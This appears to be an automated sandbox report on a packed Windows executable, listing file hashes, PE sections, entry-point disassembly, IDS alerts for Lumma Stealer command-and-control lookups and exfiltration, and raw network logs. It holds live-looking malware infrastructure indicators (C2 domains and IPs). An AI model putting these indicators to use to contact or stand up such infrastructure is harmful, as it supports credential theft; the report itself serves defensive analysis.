                                                                                                                                                                                                                            Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (46884)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1814504
                                                                                                                                                                                                                            Entropy (8bit):5.501700082361208
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:2xjhHnfpSAjSB1DkCXWQjOAXE2MMge1tae:2DHnhSAjSB1DkCXWQjOWE2ngetP
                                                                                                                                                                                                                            MD5:BA62F9A7D6B293500DBFFBFA6BDC94A6
                                                                                                                                                                                                                            SHA1:8C95BC6054CA865EBCE7A7EF3A51458A8EE2D7A0
                                                                                                                                                                                                                            SHA-256:90499FBA4AEF37D720BF86C3E9784EF58C3679E43F1E0DF7CD93D0213F3A4619
                                                                                                                                                                                                                            SHA-512:BD2C71AB6B887B77F61DCBC3952174A4DC3AB1240C26EAC367F973921076296000F08E13C42F1393B3750D3911A6679CB4E47DE620A6A8229B8708A4C8723B53
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:"use strict";(()=>{var cve=Object.create;var hT=Object.defineProperty;var A2=Object.getOwnPropertyDescriptor;var dve=Object.getOwnPropertyNames;var uve=Object.getPrototypeOf,pve=Object.prototype.hasOwnProperty;var mve=(e,t,o)=>t in e?hT(e,t,{enumerable:!0,configurable:!0,writable:!0,value:o}):e[t]=o;var Ie=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var gve=(e,t,o,n)=>{if(t&&typeof t=="object"||typeof t=="function")for(let r of dve(t))!pve.call(e,r)&&r!==o&&hT(e,r,{get:()=>t[r],enumerable:!(n=A2(t,r))||n.enumerable});return e};var Ya=(e,t,o)=>(o=e!=null?cve(uve(e)):{},gve(t||!e||!e.__esModule?hT(o,"default",{value:e,enumerable:!0}):o,e));var U=(e,t,o,n)=>{for(var r=n>1?void 0:n?A2(t,o):t,s=e.length-1,i;s>=0;s--)(i=e[s])&&(r=(n?i(t,o,r):i(r))||r);return n&&r&&hT(t,o,r),r};var Yi=(e,t,o)=>(mve(e,typeof t!="symbol"?t+"":t,o),o),yR=(e,t,o)=>{if(!t.has(e))throw TypeError("Cannot "+o)};var wt=(e,t,o)=>(yR(e,t,"read from private field"),o?o.call(e):t.get(e)),Bo=(e,t,o)=>{if(t.has(
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                                            Entropy (8bit):3.875
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:HMB:k
                                                                                                                                                                                                                            MD5:0B04EA412F8FC88B51398B1CBF38110E
                                                                                                                                                                                                                            SHA1:E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
                                                                                                                                                                                                                            SHA-256:7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
                                                                                                                                                                                                                            SHA-512:6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
                                                                                                                                                                                                                            Preview:CgkKBw2/5iXyGgA=
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):207935
                                                                                                                                                                                                                            Entropy (8bit):5.420780972514107
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
                                                                                                                                                                                                                            MD5:3DE400B2682E30C3F33FA4B93116491F
                                                                                                                                                                                                                            SHA1:BC48B898DF43BA2178DE28F5A29D977B2204F846
                                                                                                                                                                                                                            SHA-256:84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
                                                                                                                                                                                                                            SHA-512:D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):18477
                                                                                                                                                                                                                            Entropy (8bit):5.147347768532056
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:cF3MGvRvqhjNLN1RlX+Vqn3wj2pC33qr3h3x7Z04519u2/8Xx7kuFg/F3Bo3h16z:63MGpvqhj/rlOVqnACpK3o3hhl0OU2/x
                                                                                                                                                                                                                            MD5:9A6B01877BAAC986FE1FBF4CAA95E7C7
                                                                                                                                                                                                                            SHA1:A3227894EACEB2177EEE7CF66A693A9B4C0971FE
                                                                                                                                                                                                                            SHA-256:12051CF7967A2E3F39971EC7F48D1892EB7138F7D1F7E5A3407D63E257EBE7AC
                                                                                                                                                                                                                            SHA-512:5DBDA31E67FE480385283A63F8C2D0CE5E1B2A04A23917F65F0EC6867A9D95C93E4B50807D42D65718EF01588AA523FE791A0A1BD0663BB5DC9BED5E43995AB2
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                            Size (bytes):207935
                                                                                                                                                                                                                            Entropy (8bit):5.420780972514107
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVliMTqwK:Wof3G0NSkNzMeO7z/l3lhTa
                                                                                                                                                                                                                            MD5:3DE400B2682E30C3F33FA4B93116491F
                                                                                                                                                                                                                            SHA1:BC48B898DF43BA2178DE28F5A29D977B2204F846
                                                                                                                                                                                                                            SHA-256:84E9EAD32EFA16BE0D5B2407F799FC3DAE497BCB4A90758C0106C8D8F55003FE
                                                                                                                                                                                                                            SHA-512:D4004E4A62A81116D346B7A7F95FC67F97A258E82B3BDDBF4A9F28CEBB633E4A336A17057A765DA306AD9B1E40A99FE349D698B095A6F386B9CDF4A46457FC06
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            URL:https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                                                                                                                                                                                                                            Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                            Entropy (8bit):6.6675704971666345
                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                            File name:file.exe
                                                                                                                                                                                                                            File size:3'221'504 bytes
                                                                                                                                                                                                                            MD5:7194b1bd9a6fa2bb6f223519917b3fb4
                                                                                                                                                                                                                            SHA1:e3c4cbbd826eae4168f0a162f39a9f968baadf55
                                                                                                                                                                                                                            SHA256:90ca2b88263f2bc22cd2803e5dc117eb0c9fea596c87a5f201ba89b98a8d9b11
                                                                                                                                                                                                                            SHA512:b6b04aa3f0db720d6ad011e8cdffeb201e86c53708eb12eb1581fb053b5237fdfeb28764c6911bd8eff41d29d2c8ff1e31f703363b23611f086e17494b4b87fb
                                                                                                                                                                                                                            SSDEEP:49152:P5Veg032Swe2nNxYq6QJ6rXH5GrYIQ0bMJ7ODM/0/Rj6D2Bbz:PHegS2SweIPL686rXnITUODM/0/RjnB
                                                                                                                                                                                                                            TLSH:BDE54C91FC4B62CFCC8E22BD8527CD46995D46FB071409D3A8696CBAADE3CC411B6D2C
                                                                                                                                                                                                                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J...........01...........@..........................`1.......2...@.................................T...h..
                                                                                                                                                                                                                            Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                            Entrypoint:0x713000
                                                                                                                                                                                                                            Entrypoint Section:.taggant
                                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                            Time Stamp:0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                            OS Version Major:6
                                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                                            File Version Major:6
                                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                                            Subsystem Version Major:6
                                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                            jmp 00007FD888B6A34Ah
                                                                                                                                                                                                                            clts
                                                                                                                                                                                                                            xor dword ptr [eax], eax
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            jmp 00007FD888B6C345h
                                                                                                                                                                                                                            add byte ptr [ecx], al
                                                                                                                                                                                                                            or al, byte ptr [eax]
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], dh
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [ecx], al
                                                                                                                                                                                                                            or al, byte ptr [eax]
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [ecx], al
                                                                                                                                                                                                                            add byte ptr [eax], 00000000h
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            adc byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            or ecx, dword ptr [edx]
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            add byte ptr [eax], al
                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x5a0540x68.idata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x590000x340.rsrc
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x5a1f80x8.idata
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                            0x10000x580000x5800009b2afdf48633a8aecef8318dab43e99False0.5764825994318182data7.062702525904719IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                            .rsrc0x590000x3400x400914cd139a383496d0085d499d138ef92False0.390625data4.997389973748798IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                            .idata 0x5a0000x10000x200555a11fa24a077379003c187d9c9d020False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                            dyyxogva0x5b0000x2b70000x2b6c00df595b3b0666b788ace1b7809493af53unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                            teovkwha0x3120000x10000x400854d1a0a567e8f5358879f950277a23aFalse0.8046875data6.157346769979449IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                            .taggant0x3130000x30000x220008288d0d2892c1148c05f88bb44c2eb1False0.04963235294117647DOS executable (COM)0.48482866888285764IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                            RT_MANIFEST0x590580x2e6XML 1.0 document, ASCII text, with CRLF line terminators0.45417789757412397
                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                            kernel32.dlllstrcpy
                                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                            2024-11-06T14:38:57.257803+01002057131ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)1192.168.2.5530201.1.1.153UDP
                                                                                                                                                                                                                            2024-11-06T14:38:57.287256+01002057129ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)1192.168.2.5509381.1.1.153UDP
                                                                                                                                                                                                                            2024-11-06T14:38:57.317415+01002057127ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)1192.168.2.5508221.1.1.153UDP
                                                                                                                                                                                                                            2024-11-06T14:38:57.343995+01002057125ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)1192.168.2.5610811.1.1.153UDP
                                                                                                                                                                                                                            2024-11-06T14:38:57.370198+01002057123ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)1192.168.2.5540061.1.1.153UDP
                                                                                                                                                                                                                            2024-11-06T14:38:57.396802+01002057121ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)1192.168.2.5639501.1.1.153UDP
                                                                                                                                                                                                                            2024-11-06T14:38:58.064816+01002057122ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)1192.168.2.549704104.21.5.155443TCP
                                                                                                                                                                                                                            2024-11-06T14:38:58.064816+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549704104.21.5.155443TCP
                                                                                                                                                                                                                            2024-11-06T14:38:58.276149+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549704104.21.5.155443TCP
                                                                                                                                                                                                                            2024-11-06T14:38:58.276149+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549704104.21.5.155443TCP
                                                                                                                                                                                                                            2024-11-06T14:38:59.289556+01002057122ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)1192.168.2.549705104.21.5.155443TCP
                                                                                                                                                                                                                            2024-11-06T14:38:59.289556+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705104.21.5.155443TCP
                                                                                                                                                                                                                            2024-11-06T14:39:00.047531+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549705104.21.5.155443TCP
                                                                                                                                                                                                                            2024-11-06T14:39:00.047531+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705104.21.5.155443TCP
                                                                                                                                                                                                                            2024-11-06T14:39:00.911892+01002057122ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)1192.168.2.549706104.21.5.155443TCP
                                                                                                                                                                                                                            2024-11-06T14:39:00.911892+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706104.21.5.155443TCP
                                                                                                                                                                                                                            2024-11-06T14:39:02.291289+01002057122ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)1192.168.2.549707104.21.5.155443TCP
                                                                                                                                                                                                                            2024-11-06T14:39:02.291289+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549707104.21.5.155443TCP
                                                                                                                                                                                                                            2024-11-06T14:39:03.773731+01002057122ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)1192.168.2.549708104.21.5.155443TCP
                                                                                                                                                                                                                            2024-11-06T14:39:03.773731+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708104.21.5.155443TCP
                                                                                                                                                                                                                            2024-11-06T14:39:06.941112+01002057122ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)1192.168.2.549709104.21.5.155443TCP
                                                                                                                                                                                                                            2024-11-06T14:39:06.941112+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549709104.21.5.155443TCP
                                                                                                                                                                                                                            2024-11-06T14:39:08.243357+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549709104.21.5.155443TCP
                                                                                                                                                                                                                            2024-11-06T14:39:09.747027+01002057122ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)1192.168.2.549710104.21.5.155443TCP
                                                                                                                                                                                                                            2024-11-06T14:39:09.747027+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549710104.21.5.155443TCP
                                                                                                                                                                                                                            2024-11-06T14:39:15.001514+01002057122ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)1192.168.2.549714104.21.5.155443TCP
                                                                                                                                                                                                                            2024-11-06T14:39:15.001514+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549714104.21.5.155443TCP
                                                                                                                                                                                                                            2024-11-06T14:39:15.516815+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.549711TCP
                                                                                                                                                                                                                            2024-11-06T14:39:16.414929+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549714104.21.5.155443TCP
                                                                                                                                                                                                                            2024-11-06T14:39:18.186163+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.549719185.215.113.1680TCP
                                                                                                                                                                                                                            2024-11-06T14:39:44.268743+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.175.87.197443192.168.2.561970TCP
                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                            Nov 6, 2024 14:38:52.809400082 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                                                            Nov 6, 2024 14:38:52.809400082 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                                                                            Nov 6, 2024 14:38:52.934417963 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                                                            Nov 6, 2024 14:38:57.442429066 CET49704443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:38:57.442456961 CET44349704104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:38:57.442557096 CET49704443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:38:57.444055080 CET49704443192.168.2.5104.21.5.155
                                                                                                                                                                                                                            Nov 6, 2024 14:38:57.444068909 CET44349704104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:38:58.064726114 CET44349704104.21.5.155192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:38:58.064815998 CET49704443192.168.2.5104.21.5.155
